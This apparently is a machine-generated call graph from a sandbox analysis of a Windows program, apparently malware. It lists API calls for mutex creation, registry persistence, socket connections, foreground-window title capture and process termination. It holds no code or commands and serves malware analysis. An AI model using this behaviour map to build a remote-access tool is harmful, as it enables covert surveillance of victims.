47747->47748 47749 401ffa 47748->47749 47750 402015 47749->47750 47751 40203c 47749->47751 48242 403098 28 API calls 47750->48242 47752 40267a 11 API calls 47751->47752 47752->47754 47755 401fd8 47754->47755 47756 4023ce 11 API calls 47755->47756 47757 401fe1 47756->47757 47757->47344 47759 401fd2 47758->47759 47760 401fc9 47758->47760 47759->47350 48243 4025e0 28 API calls 47760->48243 48244 401fab 47762->48244 47764 40d073 CreateMutexA GetLastError 47764->47366 48245 41bfb7 47765->48245 47770 401fe2 28 API calls 47771 41b2ff 47770->47771 47772 401fd8 11 API calls 47771->47772 47773 41b307 47772->47773 47774 4135a6 31 API calls 47773->47774 47776 41b35d 47773->47776 47775 41b330 47774->47775 47777 41b33b StrToIntA 47775->47777 47776->47372 47778 41b349 47777->47778 47781 41b352 47777->47781 48253 41cf69 22 API calls 47778->48253 47780 401fd8 11 API calls 47780->47776 47781->47780 47783 40772a 47782->47783 47784 413549 3 API calls 47783->47784 47785 407731 47784->47785 47785->47384 47785->47385 47787 41bc72 47786->47787 48254 40b904 47787->48254 47789 41bc7a 47789->47400 47791 401f22 47790->47791 47798 401f6a 47790->47798 47792 402252 11 API calls 47791->47792 47793 401f2b 47792->47793 47794 401f6d 47793->47794 47796 401f46 47793->47796 48287 402336 47794->48287 48286 40305c 28 API calls 47796->48286 47799 401f09 47798->47799 47800 402252 11 API calls 47799->47800 47801 401f12 47800->47801 47801->47412 47803 413965 47802->47803 47804 406dd8 28 API calls 47803->47804 47805 41397a 47804->47805 47806 4020f6 28 API calls 47805->47806 47807 41398a 47806->47807 47808 41376f 14 API calls 47807->47808 47809 413994 47808->47809 47810 401fd8 11 API calls 47809->47810 47811 4139a1 47810->47811 47811->47460 47813 40209b 47812->47813 47814 4023ce 11 API calls 47813->47814 47815 4020a6 47814->47815 48291 4024ed 47815->48291 47819 4137bf 47818->47819 47820 413788 47818->47820 47821 401fd8 11 API calls 47819->47821 47823 41379a RegSetValueExA RegCloseKey 47820->47823 47822 40ef9e 47821->47822 47822->47463 47823->47819 47825 43bac5 _strftime 47824->47825 48295 43ae03 47825->48295 47827 40efb7 47827->47469 47827->47471 47829 41b5a0 47828->47829 47830 41b505 GetLocalTime 47828->47830 47832 401fd8 11 API calls 47829->47832 47831 40531e 28 API calls 47830->47831 47834 41b547 47831->47834 47833 41b5a8 47832->47833 47835 401fd8 11 API calls 47833->47835 47836 406383 28 API calls 47834->47836 47837 40f00d 47835->47837 47838 41b553 47836->47838 47837->47487 48323 402f10 47838->48323 47841 406383 28 API calls 47842 41b56b 47841->47842 48328 407200 77 API calls 47842->48328 47844 41b579 47845 401fd8 11 API calls 47844->47845 47846 41b585 47845->47846 47847 401fd8 11 API calls 47846->47847 47848 41b58e 47847->47848 47849 401fd8 11 API calls 47848->47849 47850 41b597 47849->47850 47851 401fd8 11 API calls 47850->47851 47851->47829 47853 409e02 _wcslen 47852->47853 47854 409e24 47853->47854 47855 409e0d 47853->47855 47857 40da34 31 API calls 47854->47857 47856 40da34 31 API calls 47855->47856 47858 409e15 47856->47858 47859 409e2c 47857->47859 47860 401f13 28 API calls 47858->47860 47861 401f13 28 API calls 47859->47861 47876 409e1f 47860->47876 47862 409e3a 47861->47862 47863 401f09 11 API calls 47862->47863 47865 409e42 47863->47865 47864 401f09 11 API calls 47866 409e79 47864->47866 48347 40915b 28 API calls 47865->48347 48332 40a109 47866->48332 47869 409e54 48348 403014 47869->48348 47873 401f13 28 API calls 47874 409e69 47873->47874 47875 401f09 11 API calls 47874->47875 47875->47876 47876->47864 48400 40417e 47877->48400 47882 403014 28 API calls 47883 41b672 47882->47883 47884 401f09 11 API calls 47883->47884 47885 41b67b 47884->47885 47886 401f09 11 API calls 47885->47886 47887 40f223 47886->47887 47887->47540 47889 413520 RegQueryValueExA RegCloseKey 47888->47889 47890 40f2e4 47888->47890 47889->47890 47890->47413 47890->47569 47892 40f392 47891->47892 47893 413a3f RegDeleteValueW 47891->47893 47892->47407 47893->47892 47895 40dd5b 47894->47895 47896 4134ff 3 API calls 47895->47896 47897 40dd62 47896->47897 47901 40dd81 47897->47901 48494 401707 47897->48494 47899 40dd6f 48497 413877 RegCreateKeyA 47899->48497 47902 414f2a 47901->47902 47903 4020df 11 API calls 47902->47903 47904 414f3e 47903->47904 48511 41b8b3 47904->48511 47907 4020df 11 API calls 47908 414f54 47907->47908 47909 401e65 22 API calls 47908->47909 47910 414f62 47909->47910 47911 43baac _strftime 40 API calls 47910->47911 47912 414f6f 47911->47912 47913 414f81 47912->47913 47914 414f74 Sleep 47912->47914 47915 402093 28 API calls 47913->47915 47914->47913 47916 414f90 47915->47916 47917 401e65 22 API calls 47916->47917 47918 414f99 47917->47918 47919 4020f6 28 API calls 47918->47919 47920 414fa4 47919->47920 47921 41be1b 28 API calls 47920->47921 47922 414fac 47921->47922 48515 40489e WSAStartup 47922->48515 47924 414fb6 47925 401e65 22 API calls 47924->47925 47926 414fbf 47925->47926 47927 401e65 22 API calls 47926->47927 47976 41503e 47926->47976 47928 414fd8 47927->47928 47931 401e65 22 API calls 47928->47931 47929 401e65 22 API calls 47929->47976 47930 4020f6 28 API calls 47930->47976 47932 414fe9 47931->47932 47934 401e65 22 API calls 47932->47934 47933 41be1b 28 API calls 47933->47976 47935 414ffa 47934->47935 47936 401e65 22 API calls 47935->47936 47938 41500b 47936->47938 47937 406c1e 28 API calls 47937->47976 47939 401e65 22 API calls 47938->47939 47941 41501c 47939->47941 47940 401fe2 28 API calls 47940->47976 47943 401e65 22 API calls 47941->47943 47942 401fd8 11 API calls 47942->47976 47944 41502e 47943->47944 48661 40473d 89 API calls 47944->48661 47947 41518c WSAGetLastError 48662 41cae1 30 API calls 47947->48662 47951 402093 28 API calls 47953 41519c 47951->47953 47953->47951 47955 41b4ef 80 API calls 47953->47955 47958 401e8d 11 API calls 47953->47958 47959 401e65 22 API calls 47953->47959 47960 43baac _strftime 40 API calls 47953->47960 47953->47976 47996 415a71 CreateThread 47953->47996 47997 401fd8 11 API calls 47953->47997 47998 401f09 11 API calls 47953->47998 48663 4052fd 28 API calls 47953->48663 48665 40b051 85 API calls 47953->48665 48666 404e26 99 API calls 47953->48666 47955->47953 47957 40531e 28 API calls 47957->47976 47958->47953 47959->47953 47961 415acf Sleep 47960->47961 47961->47953 47962 406383 28 API calls 47962->47976 47963 402f10 28 API calls 47963->47976 47964 402093 28 API calls 47964->47976 47965 41b4ef 80 API calls 47965->47976 47968 40905c 28 API calls 47968->47976 47970 4136f8 3 API calls 47970->47976 47971 4135a6 31 API calls 47971->47976 47972 40417e 28 API calls 47972->47976 47976->47929 47976->47930 47976->47933 47976->47937 47976->47940 47976->47942 47976->47947 47976->47953 47976->47957 47976->47962 47976->47963 47976->47964 47976->47965 47976->47968 47976->47970 47976->47971 47976->47972 47978 401e65 22 API calls 47976->47978 48516 414ee9 47976->48516 48521 40482d 47976->48521 48528 404f51 47976->48528 48543 4048c8 connect 47976->48543 48603 41b7e0 47976->48603 48606 4145bd 47976->48606 48609 441e81 47976->48609 48613 40dd89 47976->48613 48619 41bc42 47976->48619 48622 41bd1e 47976->48622 48626 41bb8e 47976->48626 47979 415439 GetTickCount 47978->47979 47980 41bb8e 28 API calls 47979->47980 47987 415456 47980->47987 47982 41bb8e 28 API calls 47982->47987 47985 41bd1e 28 API calls 47985->47987 47987->47982 47987->47985 47988 402ea1 28 API calls 47987->47988 47989 406383 28 API calls 47987->47989 47990 402f10 28 API calls 47987->47990 47992 401fd8 11 API calls 47987->47992 47993 401f09 11 API calls 47987->47993 48631 41bae6 47987->48631 48633 41ba96 47987->48633 48638 40f8d1 GetLocaleInfoA 47987->48638 48641 402f31 28 API calls 47987->48641 48642 404c10 47987->48642 48664 404aa1 61 API calls _Yarn 47987->48664 47988->47987 47989->47987 47990->47987 47992->47987 47993->47987 47996->47953 48817 41ad17 105 API calls 47996->48817 47997->47953 47998->47953 47999->47325 48000->47333 48001->47336 48004 4020df 11 API calls 48003->48004 48005 406c2a 48004->48005 48006 4032a0 28 API calls 48005->48006 48007 406c47 48006->48007 48007->47358 48009 413573 RegQueryValueExA RegCloseKey 48008->48009 48010 40eba4 48008->48010 48009->48010 48010->47355 48010->47373 48011->47361 48012->47391 48013->47385 48014->47375 48015->47389 48818 401f86 48016->48818 48019 40da70 48822 41b5b4 29 API calls 48019->48822 48020 40daa5 48023 41bfb7 GetCurrentProcess 48020->48023 48021 40db99 GetLongPathNameW 48025 40417e 28 API calls 48021->48025 48022 40da66 48022->48021 48026 40daaa 48023->48026 48028 40dbae 48025->48028 48029 40db00 48026->48029 48030 40daae 48026->48030 48027 40da79 48031 401f13 28 API calls 48027->48031 48032 40417e 28 API calls 48028->48032 48033 40417e 28 API calls 48029->48033 48034 40417e 28 API calls 48030->48034 48035 40da83 48031->48035 48036 40dbbd 48032->48036 48037 40db0e 48033->48037 48038 40dabc 48034->48038 48040 401f09 11 API calls 48035->48040 48825 40ddd1 28 API calls 48036->48825 48043 40417e 28 API calls 48037->48043 48044 40417e 28 API calls 48038->48044 48040->48022 48041 40dbd0 48826 402fa5 28 API calls 48041->48826 48046 40db24 48043->48046 48047 40dad2 48044->48047 48045 40dbdb 48827 402fa5 28 API calls 48045->48827 48824 402fa5 28 API calls 48046->48824 48823 402fa5 28 API calls 48047->48823 48051 40dbe5 48054 401f09 11 API calls 48051->48054 48052 40db2f 48055 401f13 28 API calls 48052->48055 48053 40dadd 48056 401f13 28 API calls 48053->48056 48058 40dbef 48054->48058 48059 40db3a 48055->48059 48057 40dae8 48056->48057 48061 401f09 11 API calls 48057->48061 48062 401f09 11 API calls 48058->48062 48060 401f09 11 API calls 48059->48060 48063 40db43 48060->48063 48064 40daf1 48061->48064 48065 40dbf8 48062->48065 48067 401f09 11 API calls 48063->48067 48068 401f09 11 API calls 48064->48068 48066 401f09 11 API calls 48065->48066 48069 40dc01 48066->48069 48067->48035 48068->48035 48070 401f09 11 API calls 48069->48070 48071 40dc0a 48070->48071 48072 401f09 11 API calls 48071->48072 48073 40dc13 48072->48073 48073->47448 48074->47461 48075->47482 48077 41371e RegQueryValueExA RegCloseKey 48076->48077 48078 413742 48076->48078 48077->48078 48078->47441 48079->47475 48084 4344ef 48080->48084 48081 43bd51 _Yarn 21 API calls 48081->48084 48082 40f0d1 48082->47514 48084->48081 48084->48082 48828 442f80 7 API calls 2 library calls 48084->48828 48829 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48084->48829 48830 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48084->48830 48087->47545 48088->47533 48090->47577 48091->47380 48094 41b4c5 LoadResource LockResource SizeofResource 48093->48094 48095 40f3de 48093->48095 48094->48095 48096 43bd51 48095->48096 48101 446137 __Getctype 48096->48101 48097 446175 48113 4405dd 20 API calls __dosmaperr 48097->48113 48098 446160 RtlAllocateHeap 48100 446173 48098->48100 48098->48101 48100->47682 48101->48097 48101->48098 48112 442f80 7 API calls 2 library calls 48101->48112 48104 4020bf 48103->48104 48114 4023ce 48104->48114 48106 4020ca 48118 40250a 48106->48118 48108 4020d9 48108->47685 48110 4020b7 28 API calls 48109->48110 48111 406dec 48110->48111 48111->47692 48112->48101 48113->48100 48115 4023d8 48114->48115 48116 402428 48114->48116 48115->48116 48125 4027a7 11 API calls std::_Deallocate 48115->48125 48116->48106 48119 40251a 48118->48119 48120 402520 48119->48120 48121 402535 48119->48121 48126 402569 48120->48126 48136 4028e8 28 API calls 48121->48136 48124 402533 48124->48108 48125->48116 48137 402888 48126->48137 48128 40257d 48129 402592 48128->48129 48130 4025a7 48128->48130 48142 402a34 22 API calls 48129->48142 48144 4028e8 28 API calls 48130->48144 48133 40259b 48143 4029da 22 API calls 48133->48143 48135 4025a5 48135->48124 48136->48124 48138 402890 48137->48138 48139 402898 48138->48139 48145 402ca3 22 API calls 48138->48145 48139->48128 48142->48133 48143->48135 48144->48135 48147 4020e7 48146->48147 48148 4023ce 11 API calls 48147->48148 48149 4020f2 48148->48149 48149->47701 48164 40423a 48150->48164 48154 41ce41 48153->48154 48155 41cea0 48154->48155 48158 41ce51 48154->48158 48156 41ceba 48155->48156 48157 41cfe0 28 API calls 48155->48157 48179 41d146 28 API calls 48156->48179 48157->48156 48160 41ce89 48158->48160 48170 41cfe0 48158->48170 48178 41d146 28 API calls 48160->48178 48161 41ce9c 48161->47701 48165 404243 48164->48165 48166 4023ce 11 API calls 48165->48166 48167 40424e 48166->48167 48168 402569 28 API calls 48167->48168 48169 4041b5 48168->48169 48169->47701 48172 41cfe8 48170->48172 48171 41d01a 48171->48160 48172->48171 48173 41d01e 48172->48173 48176 41d002 48172->48176 48190 402725 22 API calls 48173->48190 48180 41d051 48176->48180 48178->48161 48179->48161 48181 41d05b __EH_prolog 48180->48181 48191 402717 22 API calls 48181->48191 48183 41d06e 48192 41d15d 11 API calls 48183->48192 48185 41d094 48186 41d0cc 48185->48186 48193 402730 11 API calls 48185->48193 48186->48171 48188 41d0b3 48194 402712 11 API calls std::_Deallocate 48188->48194 48191->48183 48192->48185 48193->48188 48194->48186 48195->47724 48196->47728 48197->47730 48201 4032aa 48199->48201 48200 4032c9 48200->47740 48201->48200 48203 4028e8 28 API calls 48201->48203 48203->48200 48205 4051fb 48204->48205 48214 405274 48205->48214 48207 405208 48207->47743 48209 402061 48208->48209 48210 4023ce 11 API calls 48209->48210 48211 40207b 48210->48211 48238 40267a 48211->48238 48215 405282 48214->48215 48216 405288 48215->48216 48217 40529e 48215->48217 48225 4025f0 48216->48225 48219 4052f5 48217->48219 48220 4052b6 48217->48220 48235 4028a4 22 API calls 48219->48235 48224 40529c 48220->48224 48234 4028e8 28 API calls 48220->48234 48224->48207 48226 402888 22 API calls 48225->48226 48227 402602 48226->48227 48228 402672 48227->48228 48230 402629 48227->48230 48237 4028a4 22 API calls 48228->48237 48233 40263b 48230->48233 48236 4028e8 28 API calls 48230->48236 48233->48224 48234->48224 48236->48233 48239 40268b 48238->48239 48240 4023ce 11 API calls 48239->48240 48241 40208d 48240->48241 48241->47746 48242->47754 48243->47759 48246 41bfc4 GetCurrentProcess 48245->48246 48247 41b2d1 48245->48247 48246->48247 48248 4135a6 RegOpenKeyExA 48247->48248 48249 4135d4 RegQueryValueExA RegCloseKey 48248->48249 48250 4135fe 48248->48250 48249->48250 48251 402093 28 API calls 48250->48251 48252 413613 48251->48252 48252->47770 48253->47781 48255 40b90c 48254->48255 48260 402252 48255->48260 48257 40b917 48264 40b92c 48257->48264 48259 40b926 48259->47789 48261 40225c 48260->48261 48262 4022ac 48260->48262 48261->48262 48271 402779 11 API calls std::_Deallocate 48261->48271 48262->48257 48265 40b966 48264->48265 48266 40b938 48264->48266 48283 4028a4 22 API calls 48265->48283 48272 4027e6 48266->48272 48270 40b942 48270->48259 48271->48262 48273 4027ef 48272->48273 48274 402851 48273->48274 48275 4027f9 48273->48275 48285 4028a4 22 API calls 48274->48285 48278 402802 48275->48278 48280 402815 48275->48280 48284 402aea 28 API calls __EH_prolog 48278->48284 48281 402813 48280->48281 48282 402252 11 API calls 48280->48282 48281->48270 48282->48281 48284->48281 48286->47798 48288 402347 48287->48288 48289 402252 11 API calls 48288->48289 48290 4023c7 48289->48290 48290->47798 48292 4024f9 48291->48292 48293 40250a 28 API calls 48292->48293 48294 4020b1 48293->48294 48294->47453 48311 43ba0a 48295->48311 48297 43ae50 48317 43a7b7 36 API calls 3 library calls 48297->48317 48299 43ae15 48299->48297 48300 43ae2a 48299->48300 48310 43ae2f pre_c_initialization 48299->48310 48316 4405dd 20 API calls __dosmaperr 48300->48316 48303 43ae5c 48304 43ae8b 48303->48304 48318 43ba4f 40 API calls __Tolower 48303->48318 48307 43aef7 48304->48307 48319 43b9b6 20 API calls 2 library calls 48304->48319 48320 43b9b6 20 API calls 2 library calls 48307->48320 48308 43afbe _strftime 48308->48310 48321 4405dd 20 API calls __dosmaperr 48308->48321 48310->47827 48312 43ba22 48311->48312 48313 43ba0f 48311->48313 48312->48299 48322 4405dd 20 API calls __dosmaperr 48313->48322 48315 43ba14 pre_c_initialization 48315->48299 48316->48310 48317->48303 48318->48303 48319->48307 48320->48308 48321->48310 48322->48315 48329 401fb0 48323->48329 48325 402f1e 48326 402055 11 API calls 48325->48326 48327 402f2d 48326->48327 48327->47841 48328->47844 48330 4025f0 28 API calls 48329->48330 48331 401fbd 48330->48331 48331->48325 48333 40a127 48332->48333 48334 413549 3 API calls 48333->48334 48335 40a12e 48334->48335 48336 40a142 48335->48336 48337 40a15c 48335->48337 48338 409e9b 48336->48338 48339 40a147 48336->48339 48340 40905c 28 API calls 48337->48340 48338->47506 48353 40905c 48339->48353 48342 40a16a 48340->48342 48360 40a179 86 API calls 48342->48360 48346 40a15a 48346->48338 48347->47869 48377 403222 48348->48377 48350 403022 48381 403262 48350->48381 48354 409072 48353->48354 48355 402252 11 API calls 48354->48355 48356 40908c 48355->48356 48361 404267 48356->48361 48358 40909a 48359 40a22d 29 API calls 48358->48359 48359->48346 48373 40a273 163 API calls 48359->48373 48360->48338 48374 40a267 86 API calls 48360->48374 48375 40a289 48 API calls 48360->48375 48376 40a27d 128 API calls 48360->48376 48362 402888 22 API calls 48361->48362 48363 40427b 48362->48363 48364 404290 48363->48364 48365 4042a5 48363->48365 48371 4042df 22 API calls 48364->48371 48367 4027e6 28 API calls 48365->48367 48370 4042a3 48367->48370 48368 404299 48372 402c48 22 API calls 48368->48372 48370->48358 48371->48368 48372->48370 48378 40322e 48377->48378 48387 403618 48378->48387 48380 40323b 48380->48350 48382 40326e 48381->48382 48383 402252 11 API calls 48382->48383 48384 403288 48383->48384 48385 402336 11 API calls 48384->48385 48386 403031 48385->48386 48386->47873 48388 403626 48387->48388 48389 403644 48388->48389 48390 40362c 48388->48390 48392 40365c 48389->48392 48393 40369e 48389->48393 48398 4036a6 28 API calls 48390->48398 48396 4027e6 28 API calls 48392->48396 48397 403642 48392->48397 48399 4028a4 22 API calls 48393->48399 48396->48397 48397->48380 48398->48397 48401 404186 48400->48401 48402 402252 11 API calls 48401->48402 48403 404191 48402->48403 48411 4041bc 48403->48411 48406 4042fc 48422 404353 48406->48422 48408 40430a 48409 403262 11 API calls 48408->48409 48410 404319 48409->48410 48410->47882 48412 4041c8 48411->48412 48415 4041d9 48412->48415 48414 40419c 48414->48406 48416 4041e9 48415->48416 48417 404206 48416->48417 48418 4041ef 48416->48418 48419 4027e6 28 API calls 48417->48419 48420 404267 28 API calls 48418->48420 48421 404204 48419->48421 48420->48421 48421->48414 48423 40435f 48422->48423 48426 404371 48423->48426 48425 40436d 48425->48408 48427 40437f 48426->48427 48428 404385 48427->48428 48429 40439e 48427->48429 48492 4034e6 28 API calls 48428->48492 48430 402888 22 API calls 48429->48430 48431 4043a6 48430->48431 48433 404419 48431->48433 48434 4043bf 48431->48434 48493 4028a4 22 API calls 48433->48493 48437 4027e6 28 API calls 48434->48437 48445 40439c 48434->48445 48437->48445 48445->48425 48492->48445 48500 43aa9a 48494->48500 48498 4138b9 48497->48498 48499 41388f RegSetValueExA RegCloseKey 48497->48499 48498->47901 48499->48498 48503 43aa1b 48500->48503 48502 40170d 48502->47899 48504 43aa2a 48503->48504 48505 43aa3e 48503->48505 48509 4405dd 20 API calls __dosmaperr 48504->48509 48508 43aa2f pre_c_initialization __alldvrm 48505->48508 48510 448957 11 API calls 2 library calls 48505->48510 48508->48502 48509->48508 48510->48508 48514 41b8f9 _Yarn ___scrt_get_show_window_mode 48511->48514 48512 402093 28 API calls 48513 414f49 48512->48513 48513->47907 48514->48512 48515->47924 48517 414f02 getaddrinfo WSASetLastError 48516->48517 48518 414ef8 48516->48518 48517->47976 48667 414d86 29 API calls ___std_exception_copy 48518->48667 48520 414efd 48520->48517 48522 404846 socket 48521->48522 48523 404839 48521->48523 48525 404860 CreateEventW 48522->48525 48526 404842 48522->48526 48668 40489e WSAStartup 48523->48668 48525->47976 48526->47976 48527 40483e 48527->48522 48527->48526 48529 404f65 48528->48529 48530 404fea 48528->48530 48531 404f6e 48529->48531 48532 404fc0 CreateEventA CreateThread 48529->48532 48533 404f7d GetLocalTime 48529->48533 48530->47976 48531->48532 48532->48530 48670 405150 48532->48670 48534 41bb8e 28 API calls 48533->48534 48535 404f91 48534->48535 48669 4052fd 28 API calls 48535->48669 48544 404a1b 48543->48544 48545 4048ee 48543->48545 48546 40497e 48544->48546 48547 404a21 WSAGetLastError 48544->48547 48545->48546 48548 404923 48545->48548 48550 40531e 28 API calls 48545->48550 48546->47976 48547->48546 48549 404a31 48547->48549 48674 420c60 27 API calls 48548->48674 48551 404932 48549->48551 48552 404a36 48549->48552 48554 40490f 48550->48554 48557 402093 28 API calls 48551->48557 48679 41cae1 30 API calls 48552->48679 48558 402093 28 API calls 48554->48558 48556 40492b 48556->48551 48560 404941 48556->48560 48561 404a80 48557->48561 48562 40491e 48558->48562 48559 404a40 48680 4052fd 28 API calls 48559->48680 48567 404950 48560->48567 48568 404987 48560->48568 48564 402093 28 API calls 48561->48564 48565 41b4ef 80 API calls 48562->48565 48569 404a8f 48564->48569 48565->48548 48571 402093 28 API calls 48567->48571 48676 421a40 54 API calls 48568->48676 48572 41b4ef 80 API calls 48569->48572 48575 40495f 48571->48575 48572->48546 48581 402093 28 API calls 48575->48581 48576 40498f 48578 4049c4 48576->48578 48579 404994 48576->48579 48678 420e06 28 API calls 48578->48678 48582 402093 28 API calls 48579->48582 48584 40496e 48581->48584 48586 4049a3 48582->48586 48587 41b4ef 80 API calls 48584->48587 48589 402093 28 API calls 48586->48589 48590 404973 48587->48590 48588 4049cc 48591 4049f9 CreateEventW CreateEventW 48588->48591 48593 402093 28 API calls 48588->48593 48592 4049b2 48589->48592 48675 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48590->48675 48591->48546 48594 41b4ef 80 API calls 48592->48594 48596 4049e2 48593->48596 48597 4049b7 48594->48597 48598 402093 28 API calls 48596->48598 48677 4210b2 52 API calls 48597->48677 48599 4049f1 48598->48599 48601 41b4ef 80 API calls 48599->48601 48602 4049f6 48601->48602 48602->48591 48681 41b7b6 GlobalMemoryStatusEx 48603->48681 48605 41b7f5 48605->47976 48682 414580 48606->48682 48610 441e8d 48609->48610 48712 441c7d 48610->48712 48612 441eae 48612->47976 48614 40dda5 48613->48614 48615 4134ff 3 API calls 48614->48615 48617 40ddac 48615->48617 48616 40ddc4 48616->47976 48617->48616 48618 413549 3 API calls 48617->48618 48618->48616 48620 4020b7 28 API calls 48619->48620 48621 41bc57 48620->48621 48621->47976 48623 41bd2b 48622->48623 48624 4020b7 28 API calls 48623->48624 48625 41bd3d 48624->48625 48625->47976 48627 441e81 20 API calls 48626->48627 48628 41bbb2 48627->48628 48629 402093 28 API calls 48628->48629 48630 41bbc0 48629->48630 48630->47976 48632 41bafc GetTickCount 48631->48632 48632->47987 48634 436e90 ___scrt_get_show_window_mode 48633->48634 48635 41bab5 GetForegroundWindow GetWindowTextW 48634->48635 48636 40417e 28 API calls 48635->48636 48637 41badf 48636->48637 48637->47987 48639 402093 28 API calls 48638->48639 48640 40f8f6 48639->48640 48640->47987 48641->47987 48643 4020df 11 API calls 48642->48643 48644 404c27 48643->48644 48645 4020df 11 API calls 48644->48645 48649 404c30 48645->48649 48646 43bd51 _Yarn 21 API calls 48646->48649 48648 404c96 48648->48649 48651 404ca1 48648->48651 48649->48646 48649->48648 48650 4020b7 28 API calls 48649->48650 48652 401fe2 28 API calls 48649->48652 48655 401fd8 11 API calls 48649->48655 48717 404cc3 48649->48717 48729 404b96 57 API calls 48649->48729 48650->48649 48730 404e26 99 API calls 48651->48730 48652->48649 48654 404ca8 48656 401fd8 11 API calls 48654->48656 48655->48649 48657 404cb1 48656->48657 48658 401fd8 11 API calls 48657->48658 48659 404cba 48658->48659 48659->47953 48661->47976 48662->47953 48664->47987 48665->47953 48666->47953 48667->48520 48668->48527 48673 40515c 102 API calls 48670->48673 48672 405159 48673->48672 48674->48556 48675->48546 48676->48576 48677->48590 48678->48588 48679->48559 48681->48605 48685 414553 48682->48685 48686 414568 ___scrt_initialize_default_local_stdio_options 48685->48686 48689 43f79d 48686->48689 48692 43c4f0 48689->48692 48693 43c530 48692->48693 48694 43c518 48692->48694 48693->48694 48696 43c538 48693->48696 48707 4405dd 20 API calls __dosmaperr 48694->48707 48708 43a7b7 36 API calls 3 library calls 48696->48708 48698 43c548 48709 43cc76 20 API calls 2 library calls 48698->48709 48699 43c51d pre_c_initialization 48701 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 48699->48701 48703 414576 48701->48703 48702 43c5c0 48710 43d2e4 51 API calls 3 library calls 48702->48710 48703->47976 48706 43c5cb 48711 43cce0 20 API calls _free 48706->48711 48707->48699 48708->48698 48709->48702 48710->48706 48711->48699 48713 441c94 48712->48713 48715 441ccb pre_c_initialization 48713->48715 48716 4405dd 20 API calls __dosmaperr 48713->48716 48715->48612 48716->48715 48718 4020df 11 API calls 48717->48718 48723 404cde 48718->48723 48719 404e13 48720 401fd8 11 API calls 48719->48720 48721 404e1c 48720->48721 48721->48648 48722 4041a2 28 API calls 48722->48723 48723->48719 48723->48722 48724 401fe2 28 API calls 48723->48724 48725 401fc0 28 API calls 48723->48725 48726 4020f6 28 API calls 48723->48726 48728 401fd8 11 API calls 48723->48728 48724->48723 48727 404dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 48725->48727 48726->48723 48727->48723 48731 415aea 48727->48731 48728->48723 48729->48649 48730->48654 48732 4020f6 28 API calls 48731->48732 48733 415b0c SetEvent 48732->48733 48734 415b21 48733->48734 48735 4041a2 28 API calls 48734->48735 48736 415b3b 48735->48736 48737 4020f6 28 API calls 48736->48737 48738 415b4b 48737->48738 48739 4020f6 28 API calls 48738->48739 48740 415b5d 48739->48740 48741 41be1b 28 API calls 48740->48741 48742 415b66 48741->48742 48743 417089 48742->48743 48744 415b86 GetTickCount 48742->48744 48745 415d2f 48742->48745 48746 401e8d 11 API calls 48743->48746 48747 41bb8e 28 API calls 48744->48747 48745->48743 48808 415ce5 48745->48808 48748 417092 48746->48748 48749 415b97 48747->48749 48751 401fd8 11 API calls 48748->48751 48752 41bae6 GetTickCount 48749->48752 48753 41709e 48751->48753 48754 415ba3 48752->48754 48755 401fd8 11 API calls 48753->48755 48756 41bb8e 28 API calls 48754->48756 48757 4170aa 48755->48757 48758 415bae 48756->48758 48759 41ba96 30 API calls 48758->48759 48760 415bbc 48759->48760 48761 41bd1e 28 API calls 48760->48761 48762 415bca 48761->48762 48763 401e65 22 API calls 48762->48763 48764 415bd8 48763->48764 48810 402f31 28 API calls 48764->48810 48766 415be6 48811 402ea1 28 API calls 48766->48811 48768 415bf5 48769 402f10 28 API calls 48768->48769 48770 415c04 48769->48770 48812 402ea1 28 API calls 48770->48812 48772 415c13 48773 402f10 28 API calls 48772->48773 48774 415c1f 48773->48774 48813 402ea1 28 API calls 48774->48813 48776 415c29 48814 404aa1 61 API calls _Yarn 48776->48814 48778 415c38 48779 401fd8 11 API calls 48778->48779 48780 415c41 48779->48780 48781 401fd8 11 API calls 48780->48781 48782 415c4d 48781->48782 48783 401fd8 11 API calls 48782->48783 48784 415c59 48783->48784 48785 401fd8 11 API calls 48784->48785 48786 415c65 48785->48786 48787 401fd8 11 API calls 48786->48787 48788 415c71 48787->48788 48789 401fd8 11 API calls 48788->48789 48790 415c7d 48789->48790 48791 401f09 11 API calls 48790->48791 48792 415c86 48791->48792 48793 401fd8 11 API calls 48792->48793 48794 415c8f 48793->48794 48795 401fd8 11 API calls 48794->48795 48796 415c98 48795->48796 48797 401e65 22 API calls 48796->48797 48798 415ca3 48797->48798 48799 43baac _strftime 40 API calls 48798->48799 48800 415cb0 48799->48800 48801 415cb5 48800->48801 48802 415cdb 48800->48802 48804 415cc3 48801->48804 48805 415cce 48801->48805 48803 401e65 22 API calls 48802->48803 48803->48808 48815 404ff4 82 API calls 48804->48815 48807 404f51 105 API calls 48805->48807 48809 415cc9 48807->48809 48808->48743 48816 4050e4 84 API calls 48808->48816 48809->48743 48810->48766 48811->48768 48812->48772 48813->48776 48814->48778 48815->48809 48816->48809 48819 401f8e 48818->48819 48820 402252 11 API calls 48819->48820 48821 401f99 48820->48821 48821->48019 48821->48020 48821->48022 48822->48027 48823->48053 48824->48052 48825->48041 48826->48045 48827->48051 48828->48084 48833 40f7c2 48831->48833 48832 413549 3 API calls 48832->48833 48833->48832 48834 40f866 48833->48834 48836 40f856 Sleep 48833->48836 48853 40f7f4 48833->48853 48837 40905c 28 API calls 48834->48837 48835 40905c 28 API calls 48835->48853 48836->48833 48840 40f871 48837->48840 48839 41bc5e 28 API calls 48839->48853 48841 41bc5e 28 API calls 48840->48841 48842 40f87d 48841->48842 48866 413814 14 API calls 48842->48866 48845 401f09 11 API calls 48845->48853 48846 40f890 48847 401f09 11 API calls 48846->48847 48849 40f89c 48847->48849 48848 402093 28 API calls 48848->48853 48850 402093 28 API calls 48849->48850 48851 40f8ad 48850->48851 48854 41376f 14 API calls 48851->48854 48852 41376f 14 API calls 48852->48853 48853->48835 48853->48836 48853->48839 48853->48845 48853->48848 48853->48852 48864 40d096 112 API calls ___scrt_get_show_window_mode 48853->48864 48865 413814 14 API calls 48853->48865 48855 40f8c0 48854->48855 48867 412850 TerminateProcess WaitForSingleObject 48855->48867 48857 40f8c8 ExitProcess 48868 4127ee 62 API calls 48858->48868 48865->48853 48866->48846 48867->48857 48869 4269e6 48870 4269fb 48869->48870 48877 426a8d 48869->48877 48871 426a48 48870->48871 48872 426b44 48870->48872 48873 426abd 48870->48873 48874 426b1d 48870->48874 48870->48877 48879 426af2 48870->48879 48883 426a7d 48870->48883 48897 424edd 49 API calls _Yarn 